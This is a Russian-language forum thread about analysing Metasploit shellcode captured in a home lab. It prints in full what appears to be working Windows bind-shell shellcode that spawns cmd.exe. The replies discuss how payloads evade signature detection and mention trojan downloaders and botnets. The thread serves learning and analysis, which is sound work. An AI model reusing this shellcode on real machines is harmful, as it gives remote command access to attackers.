Всем добрый день Поставил виртуальную машину, на нее залил заведомо дырявый Windows. Запустил на виртуальной машине Wireshark, чтобы анализировать входящие пакеты. На родной машине поставил Metasploit Framework 3 и пробил виртуалку, в целях безопасности не буду говорить каким эксплоитом и shell-кодом. Далее я проанализировал shell скрипт, он содержит байт код:
'Payload' =>
"\xFC\xE8\x89\x00\x00\x00\x60\x89\xE5\x31\xD2\x64\x8B\x52\x30\x8B" +
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\x31\xC0" +
"\xAC\x3C\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF0\x52\x57" +
"\x8B\x52\x10\x8B\x42\x3C\x01\xD0\x8B\x40\x78\x85\xC0\x74\x4A\x01" +
"\xD0\x50\x8B\x48\x18\x8B\x58\x20\x01\xD3\xE3\x3C\x49\x8B\x34\x8B" +
"\x01\xD6\x31\xFF\x31\xC0\xAC\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF4" +
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5F\x54\x68\x4C\x77\x26\x07" +
"\xFF\xD5\xB8\x90\x01\x00\x00\x29\xC4\x54\x50\x68\x29\x80\x6B\x00" +
"\xFF\xD5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF" +
"\xD5\x89\xC7\x31\xDB\x53\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56" +
"\x57\x68\xC2\xDB\x37\x67\xFF\xD5\x53\x57\x68\xB7\xE9\x38\xFF\xFF" +
"\xD5\x53\x53\x57\x68\x74\xEC\x3B\xE1\xFF\xD5\x57\x89\xC7\x68\x75" +
"\x6E\x4D\x61\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31" +
"\xF6\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44" +
"\x24\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53" +
"\x56\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68" +
"\x08\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D" +
"\xFF\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F" +
"\x6A\x00\x53\xFF\xD5".
В этом байт-коде есть последовательность \x63\x6D\x64 = cmd, shell код поднимает cmd на машине жертвы. Но вот что странно: я анализировал все входящие пакеты на машине жертвы с помощью Wireshark и не встретил там последовательности cmd, как shell коду удалось запустить cmd.exe?

Здравствуйте, eboev, Вы писали:

E>В этом байт-коде есть последовательность \x63\x6D\x64 = cmd, shell код поднимает cmd на машине жертвы. Но вот что странно: я анализировал все входящие пакеты на машине жертвы с помощью Wireshark и не встретил там последовательности cmd, как shell коду удалось запустить cmd.exe?

Ну во-первых шелл-код мог быть разбит, например, на 2 и конец первого пакета содержал, например, \x63, а начала второго — \x6D\x64.
Во-вторых некоторые эксплойты могут поддерживать шифрование шелл-кода для обхода сигнатурных систем обнаружения сетевых атак и расшифровывать его перед подсовыванием дырявому приложению.
Попробуйте сначала поискать в перехватываемом трафике другую последовательность байт из шелл-кода и далее поищите.
Посмотрите также не разбивается ли шелл-код на несколько пакетов.

Здравствуйте, -prus-, Вы писали:

P>Ну во-первых шелл-код мог быть разбит, например, на 2 и конец первого пакета содержал, например, \x63, а начала второго — \x6D\x64.
P>Во-вторых некоторые эксплойты могут поддерживать шифрование шелл-кода для обхода сигнатурных систем обнаружения сетевых атак и расшифровывать его перед подсовыванием дырявому приложению.
P>Попробуйте сначала поискать в перехватываемом трафике другую последовательность байт из шелл-кода и далее поищите.
P>Посмотрите также не разбивается ли шелл-код на несколько пакетов.

Спасибо
Я решил проанализировать что обыно делают шеллкоды и пришел к выводу:
1)запускают шелл
2)вызывают отказ в обслуживании, создавая много новых потоков.
3)открывают порт (обычно с номером > 1024)

Я не нашел гуглом никаких аналитических отчетов, по этому вопросу, посмотрю базу эксплоитов Metasploit Framework. Если у кого есть киньте пожалуйста ссылочку на подобную информацию.

Здравствуйте, eboev, Вы писали:

E>Я не нашел гуглом никаких аналитических отчетов, по этому вопросу, посмотрю базу эксплоитов Metasploit Framework. Если у кого есть киньте пожалуйста ссылочку на подобную информацию.

Если вы хотите ориентироваться в этой теме, то вам нужно для начала понимать, как это работает и откуда что берется.
Для этого нужно для начала почитать:

1. Разработка средств безопасности и эксплойтов (Джеймс К. Фостер, Винсент Лю)

Автор(ы): Джеймс К. Фостер, Винсент Лю
Издательство: Питер
Цена: 429р.

Подробное практическое руководство по разработке средств безопасности программного обеспечения. Многочисленные примеры использования различных типов уязвимостей компьютерных систем. Детальный анализ техник взлома. В этой книге:

2. Защита от взлома. Сокеты, shell-код, эксплойты (Джеймс С. Фостер)

Автор(ы): Джеймс С. Фостер
Издательство: ДМК пресс
Цена: 629р.

В своей новой книге Джеймс Фостер, автор ряда бестселлеров, впервые описывает методы, которыми пользуются хакеры для атак на операционные системы и прикладные программы. Он приводит примеры работающего кода на языках C/C++, Java, Perl и NASL, в

3. Программирование боевого софта под Linux (Иван Скляров)

В этих книжках довольно неплохо написано про интересующую вас тематику.

-prus-, я пользовался первыми двумя приведенными источниками. Особенно ине понравился реальный пример с переполнением буфера, когда в регист eip записывается адрес команды call eax из динамически подгружаемой библиотеки

P>1. Разработка средств безопасности и эксплойтов (Джеймс К. Фостер, Винсент Лю)

Автор(ы): Джеймс К. Фостер, Винсент Лю
Издательство: Питер
Цена: 429р.

Подробное практическое руководство по разработке средств безопасности программного обеспечения. Многочисленные примеры использования различных типов уязвимостей компьютерных систем. Детальный анализ техник взлома. В этой книге:

P>2. Защита от взлома. Сокеты, shell-код, эксплойты (Джеймс С. Фостер)

Автор(ы): Джеймс С. Фостер
Издательство: ДМК пресс
Цена: 629р.

В своей новой книге Джеймс Фостер, автор ряда бестселлеров, впервые описывает методы, которыми пользуются хакеры для атак на операционные системы и прикладные программы. Он приводит примеры работающего кода на языках C/C++, Java, Perl и NASL, в

P>3. Программирование боевого софта под Linux (Иван Скляров)

Но я не нашел анализа существующей массы шелл-кодов, меня интересует например: 80% всех шелл-кодов запускаю шелл и т.д

Здравствуйте, Аноним, Вы писали:

А>-prus-, я пользовался первыми двумя приведенными источниками. Особенно ине понравился реальный пример с переполнением буфера, когда в регист eip записывается адрес команды call eax из динамически подгружаемой библиотеки
А>Но я не нашел анализа существующей массы шелл-кодов, меня интересует например: 80% всех шелл-кодов запускаю шелл и т.д

Тогда вы на правильном пути... Конкретно базу эксплойтов, результатом работы которых является запуск шелла и привязывания его к порту я не встречал.
Посмотрите метасплойт, как вы и хотели. Плюс ко всему такие ресурсы как securityvulns, securityfocus, securitylab и тп.

Здравствуйте, eboev, Вы писали:

E>Спасибо
E>Я решил проанализировать что обыно делают шеллкоды и пришел к выводу:
E>1)запускают шелл
E>2)вызывают отказ в обслуживании, создавая много новых потоков.
E>3)открывают порт (обычно с номером > 1024)

Ничего подобного. Шеллкоды так делали в древние 70-80ые. И название "шеллкод" закрепилось исторически. За кодом, который исполняется через уязвимость. А payload у шеллкода может быть каким угодно. Например классическим downloader-ом, скачивающим тело первоначального трояна и запускающим его. Обычно это полноценный троян небольшого размера, закрепляющий машину в download-ботнете. И мониторящий команды на загрузку уже окончательного говна в любых количествах.

IID>окончательного говна

"окончательное говно" — гуд, ушло в мемориз.